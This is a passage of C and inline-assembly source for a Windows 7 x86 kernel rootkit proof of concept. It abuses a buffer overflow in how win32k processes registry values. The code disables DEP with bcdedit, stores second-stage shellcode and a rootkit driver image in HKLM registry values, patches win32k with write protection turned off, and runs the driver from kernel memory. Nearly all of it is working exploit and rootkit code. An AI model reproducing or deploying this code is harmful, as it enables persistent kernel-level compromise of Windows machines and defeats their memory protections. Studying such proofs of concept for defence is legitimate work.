_loop\r\n    }\r\n\r\n    // end marker\r\n    EMIT('~' _ 'E' _ 'N' _ 'D')\r\n}\r\n//--------------------------------------------------------------------------------------\r\n/**\r\n * Constants and flags for RtlQueryRegistryValues()\r\n */\r\n\r\n// RTL_QUERY_REGISTRY_DIRECT | RTL_QUERY_REGISTRY_REQUIRED\r\n#define QUERY_REGISTRY_TABLE_FLAGS  0x00000024\r\n\r\n// RTL_REGISTRY_CONTROL | RTL_REGISTRY_OPTIONAL\r\n#define QUERY_REGISTRY_RELATIVETO   0x80000002\r\n\r\n#define QUERY_REGISTRY_TABLE_SIZE 0x38\r\n\r\n__declspec(naked) void Shellcode_2(void)\r\n{\r\n    __asm \r\n    {\r\n        /**\r\n         * 2-nd STAGE SHELLCODE BEGIN\r\n         *\r\n         * EBX - win32k!NtUserInitialize()\r\n         * EDI - nt!MmIsAddressValid()\r\n         *\r\n         */\r\n\r\n#ifdef USE_SHELLCODE_DEBUGBREAK\r\n\r\n        int     
3\r\n#endif\r\n\r\n        /**\r\n         * Calculate shellcode address.\r\n         */\r\n        mov     esi, ebx\r\n        call    _realloc\r\n\r\n_realloc:\r\n        \r\n        pop     ebx\r\n        sub     ebx, _realloc\r\n\r\n        /** \r\n         * Find win32k address\r\n         */\r\n        xor     si, si\r\n\r\n_find_win32:\r\n\r\n        cmp     word ptr [esi], IMAGE_DOS_SIGNATURE \r\n        je      _win32_ok\r\n        sub     esi, PAGE_SIZE\r\n        jmp     short _find_win32\r\n\r\n_win32_ok:\r\n\r\n        mov     [ebx + _params + _win32k_base], esi\r\n\r\n        // get kernel image start addreess\r\n        mov     ecx, [ebx + _params + _MmIsAddressValid]\r\n        sub     edi, ecx\r\n        mov     [ebx + _params + _kernel_base], edi\r\n\r\n        /**\r\n         * Patch win32k!bInitializeEUDC() to prevent\r\n         * multipile vulnerability triggering.\r\n         */\r\n\r\n        mov     ecx, [ebx + _params + _bInitializeEUDC_patch]\r\n        add     ecx, esi\r\n\r\n        // disable memory write protection\r\n        mov     eax, cr0             \r\n        and     eax, not 000010000h\r\n        mov     cr0, eax               \r\n\r\n        // perform patching with add esp, 0x14 / nop\r\n        mov     word ptr [ecx + 0], '\\x83\\xc4'\r\n        mov     word ptr [ecx + 2], '\\x14\\x90'\r\n\r\n        // enable memory write protection which was supposed to do\r\n        mov     eax, cr0\r\n        or      eax, 000010000h\r\n        mov     cr0, eax\r\n\r\n        /****************************************************\r\n         * Place any payload here:\r\n         */\r\n\r\n        mov     edx, [ebx + _params + _rootkit_size]\r\n        add     edx, 0x100\r\n        mov     ecx, [ebx + _params + _ExAllocatePool]\r\n        add     ecx, edi\r\n\r\n        // call nt!ExAllocatePool() and allocate memory for rootkit image\r\n        push    edx\r\n        push    edx\r\n        push    0\r\n        call    ecx\r\n        pop   
  edx\r\n        test    eax, eax\r\n        jz      _err_payload\r\n\r\n        /*\r\n            RtlQueryRegistryValues() remark:\r\n            \r\n            The buffer pointed to by EntryContext must begin with a signed \r\n            LONG value. The magnitude of the value must specify the size, \r\n            in bytes, of the buffer.\r\n        */\r\n        neg     edx\r\n        mov     [eax], edx\r\n        mov     ebp, eax\r\n\r\n        /*\r\n            RTL_QUERY_REGISTRY_TABLE (0x1c bytes):\r\n\r\n                +00 QueryRoutine\r\n                +04 Flags\r\n                +08 Name\r\n                +0c EntryContext\r\n                +10 DefaultType\r\n                +14 DefaultData\r\n                +18 DefaultLength\r\n        */\r\n\r\n        // allocate memory for RTL_QUERY_REGISTRY_TABLE[2]\r\n        mov     edx, esp\r\n        mov     ecx, QUERY_REGISTRY_TABLE_SIZE\r\n        sub     esp, ecx\r\n        \r\n        // fill with zero bytes\r\n        push    edx\r\n        xchg    edi, edx  \r\n        xor     eax, eax\r\n        rep     stosb\r\n        xchg    edi, edx\r\n        pop     edx\r\n\r\n        // filling the structure\r\n        mov     dword ptr [edx + 0x04], QUERY_REGISTRY_TABLE_FLAGS        \r\n        lea     eax, [ebx + _drv_val_name]\r\n        mov     [edx + 0x08], eax\r\n        mov     [edx + 0x0c], ebp\r\n\r\n        push    0\r\n        push    0\r\n        push    edx\r\n        push    0\r\n        push    QUERY_REGISTRY_RELATIVETO\r\n\r\n        // call nt!RtlQueryRegistryValues()\r\n        mov     ecx, [ebx + _params + _RtlQueryRegistryValues]\r\n        add     ecx, edi\r\n        call    ecx\r\n\r\n        add     esp, QUERY_REGISTRY_TABLE_SIZE\r\n\r\n        test    eax, eax\r\n        jnz     _err_payload\r\n\r\n        // check for DOS signature of readed data\r\n        cmp     word ptr [ebp], IMAGE_DOS_SIGNATURE \r\n        jne     _err_payload\r\n\r\n        mov     [ebx + _params + 
_rootkit_base], ebp\r\n\r\n        mov     ecx, ebp\r\n        add     ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew\r\n        mov     ecx, [ecx + 0x28] // IMAGE_OPTIONAL_HEADER::AddressOfEntryPoint\r\n        add     ecx, ebp\r\n\r\n        // call image entry point\r\n        lea     eax, [ebx + _params]\r\n        push    eax  // RegistryPath argument\r\n        push    0    // DriverObject argument\r\n        call    ecx\r\n\r\n_err_payload:\r\n\r\n#ifdef USE_SHELLCODE_DBGPRINT\r\n\r\n        lea     ecx, [ebx + _params + _szDbgPrintMessage]\r\n        push    ecx\r\n\r\n        // call nt!DbgPrint()\r\n        mov     ecx, [ebx + _params + _DbgPrint]\r\n        add     ecx, edi\r\n        call    ecx\r\n        pop     eax\r\n\r\n#endif\r\n        /****************************************************/\r\n\r\n        /**\r\n         * Make the rest of the stuff that had to be made\r\n         * by the win32k!NtUserInitialize()\r\n         */\r\n\r\n        // get current process\r\n        mov     ecx, [ebx + _params + _PsGetCurrentProcess]\r\n        add     ecx, edi\r\n        call    ecx\r\n\r\n        // set flags in PROCESSINFO\r\n        mov     ecx, [ebx + _params + _PsGetProcessWin32Process]\r\n        add     ecx, edi\r\n        push    eax\r\n        call    ecx\r\n        add     eax, 8\r\n        or      dword ptr [eax], WIN32_PROCESS_FLAGS\r\n\r\n        // call win32k!UserInitialize()\r\n        mov     ecx, [ebx + _params + _UserInitialize]\r\n        add     ecx, esi\r\n        call    ecx\r\n\r\n        /**\r\n         * Return back to the nt!_KiFastCallEntry() \r\n         * with STATUS_SUCCESS.\r\n         */\r\n\r\n        // get kernel image end addreess\r\n        mov     ecx, edi\r\n        add     ecx, [ecx + 0x3C] // IMAGE_DOS_HEADER::e_lfanew\r\n        mov     ecx, [ecx + 0x50] // IMAGE_OPTIONAL_HEADER::SizeOfImage\r\n        add     ecx, edi  \r\n\r\n        // get kernel image start addreess\r\n        mov     ebp, [ebx + _params 
+ _MmIsAddressValid]\r\n        add     ebp, edi\r\n\r\n_find_ki_ret:\r\n\r\n        // Lookup for nt!_KiFastCallEntry()+XX and EBP value in stack.\r\n        mov     ebx, edx\r\n        pop     edx\r\n\r\n        // check for the kernel pointer\r\n        cmp     edx, edi\r\n        jb      _find_ki_ret\r\n\r\n        cmp     edx, ecx\r\n        ja      _find_ki_ret\r\n\r\n        pushad\r\n\r\n        // check for valid address\r\n        push    edx\r\n        call    ebp\r\n        test    al, al\r\n\r\n        popad\r\n                \r\n        jz      _find_ki_ret\r\n\r\n        /*\r\n            Check for the instruction, at return address from the system service:\r\n\r\n            call    ebx                     ; system service call            \r\n            test    byte ptr [ebp+6Ch], 1   ; returns here\r\n            jz      short loc_4357D4\r\n            ...\r\n        */\r\n        cmp     word ptr [edx], '\\xf6\\x45'\r\n        jne     _find_ki_ret\r\n\r\n    \r\n        // return to the nt!_KiFastCallEntry() with STATUS_SUCCESS\r\n        xor     eax, eax\r\n        mov     ebp, ebx\r\n        jmp     edx\r\n\r\n_drv_val_name:\r\n\r\n        EMIT('P' _ '\\x0' _ 'C' _ '\\x0' _ 'I' _ '\\x0' _ '\\x0' _ '\\x0')\r\n\r\n_params:\r\n        /** \r\n         * Shellcode constants, see SC_PARAMS struct above\r\n         */\r\n    }\r\n\r\n    // end marker\r\n    EMIT('~' _ 'E' _ 'N' _ 'D')\r\n}\r\n//--------------------------------------------------------------------------------------\r\nDWORD ScGetSize(PDWORD pData)\r\n{\r\n    DWORD dwSize = 0;\r\n    PDWORD Ptr = pData;\r\n\r\n    // get size of code\r\n    while (*Ptr != ENDM)\r\n    {\r\n        dwSize++;\r\n\r\n        // check for the end marker\r\n        Ptr = (PDWORD)((DWORD)Ptr + 1);        \r\n    }\r\n\r\n    return dwSize;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOL ScWriteDword(PVOID pData, DWORD dwSize, DWORD dwMarker, DWORD 
dwValue)\r\n{\r\n    // find value pisition in bytes buffer by marker\r\n    for (DWORD i = 0; i < dwSize - sizeof(DWORD); i++)\r\n    {\r\n        if (*(PDWORD)((PUCHAR)pData + i) == dwMarker)\r\n        {\r\n            // replace marker with the value\r\n            *(PDWORD)((PUCHAR)pData + i) = dwValue;\r\n            return TRUE;\r\n        }\r\n    }\r\n\r\n    return FALSE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n/**\r\n * Constants for win32k.sys image analysis.\r\n */\r\n#define WIN32K_STR_1 L\"\\\\Windows\\\\WindowStations\"\r\n#define WIN32K_STR_2 L\"FontLinkDefaultChar\"\r\n\r\n#define WIN32K_STDCALL_PROLOG \"\\x8b\\xff\\x55\\x8b\\xec\"\r\n#define WIN32K_STDCALL_PROLOG_LEN 5\r\n\r\nBOOL AnalyseWin32k(PDWORD poffset_UserInitialize, PDWORD poffset_bInitializeEUDC_patch)\r\n{\r\n    DWORD offset_UserInitialize = 0;\r\n    DWORD offset_bInitializeEUDC_patch = 0;\r\n\r\n    char szPath[MAX_PATH];\r\n    GetSystemDirectory(szPath, MAX_PATH);\r\n    strcat_s(szPath, MAX_PATH, \"\\\\win32k.sys\");\r\n\r\n    HMODULE hMod = LoadLibraryEx(szPath, NULL, DONT_RESOLVE_DLL_REFERENCES);\r\n    if (hMod)\r\n    {\r\n        PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32)\r\n            ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew);\r\n        \r\n        PIMAGE_SECTION_HEADER pSection = NULL, pCodeSection = NULL;\r\n        PIMAGE_BASE_RELOCATION pRelocation = NULL;\r\n        ULONG RelocationSize = 0, NumberOfSections = 0;        \r\n        ULONGLONG OldBase = 0;\r\n\r\n        if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386)\r\n        {\r\n            // 32-bit image\r\n            if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n            {\r\n                pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(\r\n                    hMod,\r\n                    
pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress\r\n                );\r\n\r\n                RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n            }\r\n\r\n            OldBase = (ULONGLONG)pHeaders32->OptionalHeader.ImageBase;\r\n            NumberOfSections = pHeaders32->FileHeader.NumberOfSections;           \r\n\r\n            pSection = (PIMAGE_SECTION_HEADER)\r\n                (pHeaders32->FileHeader.SizeOfOptionalHeader + \r\n                (PUCHAR)&pHeaders32->OptionalHeader);            \r\n        }        \r\n        else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64)\r\n        {\r\n            // 64-bit image\r\n            PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64)\r\n                ((PUCHAR)hMod + ((PIMAGE_DOS_HEADER)hMod)->e_lfanew);\r\n\r\n            if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)\r\n            {\r\n                pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(\r\n                    hMod,\r\n                    pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress\r\n                );\r\n\r\n                RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;\r\n            }\r\n\r\n            OldBase = pHeaders64->OptionalHeader.ImageBase;\r\n            NumberOfSections = pHeaders64->FileHeader.NumberOfSections;\r\n\r\n            pSection = (PIMAGE_SECTION_HEADER)\r\n                (pHeaders64->FileHeader.SizeOfOptionalHeader + \r\n                (PUCHAR)&pHeaders64->OptionalHeader);\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, __FUNCTION__\"() ERROR: Unkown machine type\\n\");\r\n            FreeLibrary(hMod);\r\n            return FALSE;\r\n        }\r\n\r\n        // enumerate image sections        \r\n        for (ULONG i = 0; i 
< NumberOfSections; i++)\r\n        {\r\n            // find section, that contains global variable\r\n            if (!strncmp((char *)&pSection->Name, \".text\", 5))\r\n            {                \r\n                pCodeSection = pSection;\r\n                break;\r\n            }\r\n\r\n            pSection += 1;\r\n        }\r\n\r\n        if (pRelocation && pCodeSection)\r\n        {\r\n            // parse image relocation table\r\n            ULONG Size = 0;\r\n            while (RelocationSize > Size && pRelocation->SizeOfBlock)\r\n            {            \r\n                ULONG Number = (pRelocation->SizeOfBlock - 8) / 2;\r\n                PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8);            \r\n\r\n                for (ULONG i = 0; i < Number; i++)\r\n                {\r\n                    if (Rel[i] > 0)\r\n                    {\r\n                        USHORT Type = (Rel[i] & 0xF000) >> 12;\r\n                        ULONG Rva = 0;\r\n                        PVOID *Va = NULL;\r\n\r\n                        // get address of global variable that used by our instruction\r\n                        if (Type == IMAGE_REL_BASED_HIGHLOW ||\r\n                            Type == IMAGE_REL_BASED_DIR64)\r\n                        {\r\n                            Rva = pRelocation->VirtualAddress + (Rel[i] & 0x0FFF);\r\n                            Va = (PVOID *)RVATOVA(hMod, Rva);\r\n                        }\r\n                        else\r\n                        {\r\n                            DbgMsg(__FILE__, __LINE__, __FUNCTION__ \"() ERROR: Unknown relocation type (%d)\\n\", Type);\r\n                        }\r\n\r\n                        if (Va && Rva > 0 &&\r\n                            Rva > pCodeSection->VirtualAddress &&\r\n                            Rva < pCodeSection->VirtualAddress + pCodeSection->Misc.VirtualSize)\r\n                        {         \r\n                            // get address of global variable, that 
requre fixup\r\n                            PVOID VarAddr = *Va;\r\n                            VarAddr = (PVOID)((ULONGLONG)VarAddr - OldBase + (PUCHAR)hMod);\r\n\r\n                            if (!IsBadStringPtrW((LPWSTR)VarAddr, MAX_PATH))\r\n                            {\r\n                                if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_1))\r\n                                {\r\n                                    DbgMsg(\r\n                                        __FILE__, __LINE__, \r\n                                        __FUNCTION__\"(): \\\"%ws\\\" referenced at offset 0x%.8x\\n\", \r\n                                        WIN32K_STR_1, Rva\r\n                                    );\r\n\r\n                                    // lookup for stdcall prolog of win32k!UserInitialize()\r\n                                    for (DWORD i = 0; i < 50; i++)\r\n                                    {\r\n                                        if (!memcmp(\r\n                                            (PUCHAR)Va - i, \r\n                                            WIN32K_STDCALL_PROLOG,\r\n                                            WIN32K_STDCALL_PROLOG_LEN))\r\n                                        {\r\n                                            if (offset_UserInitialize > 0)\r\n                                            {\r\n                                                DbgMsg(\r\n                                                    __FILE__, __LINE__, \r\n                                                    __FUNCTION__\"() ERROR: multipile heuristic matches for win32k!UserInitialize()\\n\"\r\n                                                );\r\n\r\n                                                FreeLibrary(hMod);\r\n                                                return FALSE;\r\n                                            }\r\n\r\n                                            offset_UserInitialize = Rva - i;\r\n\r\n                              
              DbgMsg(\r\n                                                __FILE__, __LINE__, \r\n                                                __FUNCTION__\"(): win32k!UserInitialize() found at offset 0x%.8x\\n\", \r\n                                                offset_UserInitialize\r\n                                            );\r\n\r\n                                            break;\r\n                                        }\r\n                                    }\r\n                                }\r\n                                else if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_2))\r\n                                {\r\n                                    DbgMsg(\r\n                                        __FILE__, __LINE__, \r\n                                        __FUNCTION__\"(): \\\"%ws\\\" referenced at offset 0x%.8x\\n\", \r\n                                        WIN32K_STR_2, Rva\r\n                                    );\r\n\r\n                                    /*\r\n                                        Check for the following code in win32k!bInitializeEUDC():\r\n\r\n                                        mov     ?SharedQueryTable@@A.Name, offset aFontlinkdefaul ; \"FontLinkDefaultChar\"\r\n                                        mov     ?SharedQueryTable@@A.EntryContext, eax\r\n                                        call    edi ; RtlQueryRegistryValues(x,x,x,x,x)\r\n                                        test    eax, eax\r\n                                        jge     short loc_BF80525F\r\n\r\n                                    */\r\n                                    LONG InstPtr = -6;\r\n                                    PUCHAR pInst = (PUCHAR)Va;                                    \r\n\r\n                                    if (*(PUSHORT)(pInst + InstPtr) == 0x05c7)\r\n                                    {\r\n                                        // disassemble next 5 instructions\r\n                                 
       for (DWORD i = 0; i < 5; i++)\r\n                                        {\r\n                                            LONG InstLen = (LONG)c_Catchy(pInst + InstPtr);\r\n                                            if (InstLen == (LONG)CATCHY_ERROR)\r\n                                            {\r\n                                                DbgMsg(__FILE__, __LINE__, __FUNCTION__\"() ERROR: c_Catchy() fails\\n\");\r\n                                                FreeLibrary(hMod);\r\n                                                return FALSE;\r\n                                            }\r\n\r\n                                            InstPtr += InstLen;\r\n\r\n                                            // check for call edi / test eax, eax\r\n                                            if (*(PUSHORT)(pInst + InstPtr + 0) == 0xd7ff &&\r\n                                                *(PUSHORT)(pInst + InstPtr + 2) == 0xc085)\r\n                                            {\r\n                                                if (offset_bInitializeEUDC_patch > 0)\r\n                                                {\r\n                                                    DbgMsg(\r\n                                                        __FILE__, __LINE__, \r\n                                                        __FUNCTION__\"() ERROR: multipile heuristic matches for win32k!bInitializeEUDC()\\n\"\r\n                                                    );\r\n\r\n                                                    FreeLibrary(hMod);\r\n                                                    return FALSE;\r\n                                                }\r\n\r\n                                                offset_bInitializeEUDC_patch = Rva + InstPtr;\r\n\r\n                                                DbgMsg(\r\n                                                    __FILE__, __LINE__, \r\n                                                    
__FUNCTION__\"(): win32k!bInitializeEUDC() CALL EDI found at offset 0x%.8x\\n\", \r\n                                                    offset_bInitializeEUDC_patch\r\n                                                );\r\n\r\n                                                break;\r\n                                            }                                            \r\n                                        }\r\n                                    }\r\n                                }\r\n                            }\r\n                        }                        \r\n                    }\r\n                }\r\n\r\n                pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock);\r\n                Size += pRelocation->SizeOfBlock;\r\n            }\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, __FUNCTION__ \"() ERROR: Relocation directory not found\\n\");\r\n        }\r\n\r\n        FreeLibrary(hMod);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, __FUNCTION__\"(): LoadLibraryEx() ERROR %d\\n\", GetLastError());\r\n    }\r\n\r\n    if (offset_UserInitialize > 0 &&\r\n        offset_bInitializeEUDC_patch > 0)\r\n    {\r\n        *poffset_UserInitialize = offset_UserInitialize;\r\n        *poffset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch;\r\n        return TRUE;\r\n    }\r\n\r\n    return FALSE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#define GET_KERNEL_PROC_OFFSET(_fn_)                                        \\\r\n                                                                            \\\r\n    DWORD offset_##_fn_ = (DWORD)GetKernelProcOffset(#_fn_);                \\\r\n    if (offset_##_fn_ == NULL)                                              \\\r\n    {                                                                       \\\r\n        DbgMsg(__FILE__, __LINE__, \"ERROR: nt!\" 
#_fn_ \"() is not found\\n\"); \\\r\n        goto end;                                                           \\\r\n    }                                                                       \\\r\n    else                                                                    \\\r\n    {                                                                       \\\r\n        DbgMsg(                                                             \\\r\n            __FILE__, __LINE__, \"nt!\" #_fn_ \"() offset is 0x%.8x\\n\",        \\\r\n            offset_##_fn_                                                   \\\r\n        );                                                                  \\\r\n    }\r\n\r\nint _tmain(int argc, _TCHAR* argv[])\r\n{\r\n    DbgMsg(\r\n        __FILE__, __LINE__, \r\n        \"\\n***********************************************************\\n\\n\"\r\n        \" Windows kernrel rootkit PoC using registry values processing BoF.\\n\"\r\n        \" FOR INTERNAL USE ONLY!\\n\\n\"\r\n        \" (c) 2012 Oleksiuk Dmytro (aka Cr4sh)\\n\"\r\n        \" cr4sh@riseup.net\\n\"\r\n        \"\\n***********************************************************\\n\\n\"\r\n    );\r\n\r\n    BOOL bSupportedOS = TRUE;\r\n\r\n#if defined(_X86_)\r\n\r\n    BOOL bIs64 = FALSE;\r\n\r\n    typedef BOOL (WINAPI * func_IsWow64Process)(\r\n        HANDLE hProcess,\r\n        PBOOL Wow64Process\r\n    );\r\n\r\n    func_IsWow64Process f_IsWow64Process = (func_IsWow64Process)\r\n        GetProcAddress(GetModuleHandle(\"kernel32.dll\"), \"IsWow64Process\");\r\n    if (f_IsWow64Process)\r\n    {\r\n        // check for WOW64 environment\r\n        f_IsWow64Process(GetCurrentProcess(), &bIs64);\r\n    }\r\n\r\n    bSupportedOS = !bIs64;    \r\n\r\n#endif // _X86_\r\n\r\n    OSVERSIONINFOA Version;    \r\n    Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); \r\n    if (GetVersionExA(&Version))\r\n    {\t\t    \r\n        if (Version.dwPlatformId != VER_PLATFORM_WIN32_NT 
||\r\n            Version.dwMajorVersion != 6 || Version.dwMinorVersion != 1)\r\n        {\r\n            bSupportedOS = FALSE;            \r\n        }        \r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"GetVersionEx() ERROR %d\\n\", GetLastError());\r\n        goto end;    \r\n    }\r\n\r\n    if (!bSupportedOS)\r\n    {\r\n        MessageBox(\r\n            0, \r\n            \"This PoC supports only x86 versions of Windows 7 and Server 2008 R2\",\r\n            \"ERROR\",\r\n            MB_ICONERROR\r\n        );\r\n\r\n        return -1;\r\n    }\r\n\r\n    // check for the uninstall option\r\n    if (argc >= 2 && !strcmp(argv[1], \"--uninstall\"))\r\n    {\r\n        DbgMsg(\r\n            __FILE__, __LINE__, \r\n            \"[+] Deleting 1-st shellcode from \\\"%s\\\\%s\\\"...\\n\", EXPL_KEY, EXPL_VAL\r\n        );\r\n\r\n        HKEY hKey;\r\n        LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey);\r\n        if (Code == ERROR_SUCCESS)\r\n        {\r\n            // delete first rootkit part\r\n            Code = RegDeleteValue(hKey, EXPL_VAL);\r\n            if (Code == ERROR_SUCCESS)\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"[+] DELETED\\n\");\r\n            }\r\n            else if (Code == ERROR_FILE_NOT_FOUND)\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"[!] 
NOT FOUND\\n\");\r\n            }\r\n            else\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"RegDeleteValue() ERROR %d\\n\", Code);\r\n            }\r\n\r\n            RegCloseKey(hKey);\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n        }\r\n\r\n        DbgMsg(__FILE__, __LINE__, \"[+] Deleting 2-nd shellcode from \\\"%s\\\\%s\\\"...\\n\", SC2_KEY, SC2_VAL);\r\n\r\n        Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey);\r\n        if (Code == ERROR_SUCCESS)\r\n        {\r\n            // delete second rootkit part (2-nd shellcode value)\r\n            Code = RegDeleteValue(hKey, SC2_VAL);\r\n            if (Code == ERROR_SUCCESS)\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"[+] DELETED\\n\");\r\n            }\r\n            else if (Code == ERROR_FILE_NOT_FOUND)\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"[!] NOT FOUND\\n\");\r\n            }\r\n            else\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"RegDeleteValue() ERROR %d\\n\", Code);\r\n            }\r\n\r\n            RegCloseKey(hKey);\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n        }\r\n\r\n        // NOTE: only EXPL_VAL and SC2_VAL are deleted above; the DRV_VAL image written under SC2_KEY\r\n        // at install time and the bcdedit nx/pae boot settings are left in place and need separate cleanup\r\n        MessageBox(0, \"Rootkit uninstalled!\", \"SUCCESS\", MB_ICONINFORMATION);\r\n\r\n        return 0;\r\n    }\r\n\r\n    if (argc >= 2 && !strcmp(argv[1], \"--dbgbreaks\"))\r\n    {\r\n        m_DebugBreaks = TRUE;\r\n    }\r\n\r\n    DbgMsg(__FILE__, __LINE__, \"[+] Disabling DEP...\\n\");\r\n    system(\"bcdedit.exe /set {current} nx AlwaysOff\");\r\n    system(\"bcdedit.exe /set {current} pae ForceEnable\");\r\n\r\n    DWORD dwShellcodeSize_1 = ScGetSize((PDWORD)Shellcode_1);\r\n    DWORD dwShellcodeSize_2 = ScGetSize((PDWORD)Shellcode_2);\r\n    \r\n    DbgMsg(__FILE__, __LINE__, \"[+] 1-st shellcode size is %d bytes\\n\", dwShellcodeSize_1);\r\n    DbgMsg(__FILE__, 
__LINE__, \"[+] 2-nd shellcode size is %d bytes\\n\", dwShellcodeSize_2);    \r\n\r\n    DWORD offset_UserInitialize = 0;\r\n    DWORD offset_bInitializeEUDC_patch = 0;\r\n\r\n    // find unexported functions of win32k, that are needed for exploitation\r\n    if (!AnalyseWin32k(&offset_UserInitialize, &offset_bInitializeEUDC_patch))\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"ERROR: win32k.sys image analysis fails\\n\");\r\n        goto end;\r\n    }\r\n\r\n    GET_KERNEL_PROC_OFFSET(MmIsAddressValid);\r\n    GET_KERNEL_PROC_OFFSET(PsGetCurrentProcess);\r\n    GET_KERNEL_PROC_OFFSET(PsGetProcessWin32Process);    \r\n    GET_KERNEL_PROC_OFFSET(ExAllocatePool);\r\n    GET_KERNEL_PROC_OFFSET(RtlQueryRegistryValues);\r\n    GET_KERNEL_PROC_OFFSET(DbgPrint);\r\n\r\n    HKEY hKey;\r\n    LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey);\r\n    if (Code == ERROR_SUCCESS)\r\n    {\r\n        int Ptr = 0, SignLen = lstrlen(REG_SIGN_FULL);\r\n\r\n        UCHAR Buff[SHELLCODE_2_MAX_BUFF_SIZE];\r\n        FillMemory(&Buff, sizeof(Buff), 0x90);            \r\n                    \r\n        for (int i = 0; i <= 16; i++)\r\n        {\r\n            /**\r\n             * Place signatures at different offsets from the \r\n             * begining of the buffer.\r\n             *\r\n             * kd> s 0x8d000000 Lffffff 0x40 0x50 0x41 0x51 0x90\r\n             *\r\n             */\r\n            memcpy(&Buff[Ptr + i], REG_SIGN_FULL, SignLen);\r\n            Ptr += 16;\r\n        }\r\n\r\n        if (SHELLCODE_2_MAX_BUFF_SIZE - (DWORD)Ptr <= dwShellcodeSize_2)\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"ERROR: Buffer to small\\n\");\r\n            goto end;\r\n        }\r\n\r\n        // copy 2-nd shellcode to the buffer\r\n        memcpy(&Buff[Ptr], Shellcode_2, dwShellcodeSize_2);\r\n        PSC_PARAMS ShellcodeParams = (PSC_PARAMS)(&Buff[Ptr + dwShellcodeSize_2]);\r\n        ZeroMemory(ShellcodeParams, sizeof(SC_PARAMS));\r\n\r\n        if (Buff[Ptr] 
== 0xcc && !m_DebugBreaks)\r\n        {\r\n            // remove debug break\r\n            Buff[Ptr] = 0x90;\r\n        }\r\n\r\n        // set constants and parameters for 2-nd shellcode\r\n        ShellcodeParams->offset_MmIsAddressValid = offset_MmIsAddressValid;\r\n        ShellcodeParams->offset_PsGetCurrentProcess = offset_PsGetCurrentProcess;\r\n        ShellcodeParams->offset_PsGetProcessWin32Process = offset_PsGetProcessWin32Process;\r\n        ShellcodeParams->offset_ExAllocatePool = offset_ExAllocatePool;\r\n        ShellcodeParams->offset_RtlQueryRegistryValues = offset_RtlQueryRegistryValues;\r\n        ShellcodeParams->offset_UserInitialize = offset_UserInitialize;\r\n        ShellcodeParams->offset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch;\r\n        ShellcodeParams->rootkit_size = sizeof(rootkit_driver);\r\n\r\n#ifdef USE_SHELLCODE_DBGPRINT\r\n\r\n        ShellcodeParams->offset_DbgPrint = offset_DbgPrint;\r\n        strcpy_s(ShellcodeParams->szDbgPrintMessage, DBGPRINT_MESSAGE_LEN, DBGPRINT_MESSAGE);\r\n\r\n#endif\r\n\r\n        DbgMsg(__FILE__, __LINE__, \"[+] Saving 2-nd shellcode to \\\"%s\\\\%s\\\"...\\n\", SC2_KEY, SC2_VAL);\r\n\r\n        Code = RegSetValueEx(hKey, SC2_VAL, 0, REG_BINARY, (PBYTE)&Buff, sizeof(Buff));\r\n        if (Code != ERROR_SUCCESS)\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"RegSetValueEx() ERROR %d\\n\", Code);\r\n        }        \r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"[+] SUCCESS\\n\");\r\n        }\r\n\r\n        DbgMsg(__FILE__, __LINE__, \"[+] Saving rootkit image to \\\"%s\\\\%s\\\"...\\n\", SC2_KEY, DRV_VAL);\r\n\r\n        Code = RegSetValueEx(hKey, DRV_VAL, 0, REG_BINARY, (PBYTE)&rootkit_driver, sizeof(rootkit_driver));\r\n        if (Code != ERROR_SUCCESS)\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"RegSetValueEx() ERROR %d\\n\", 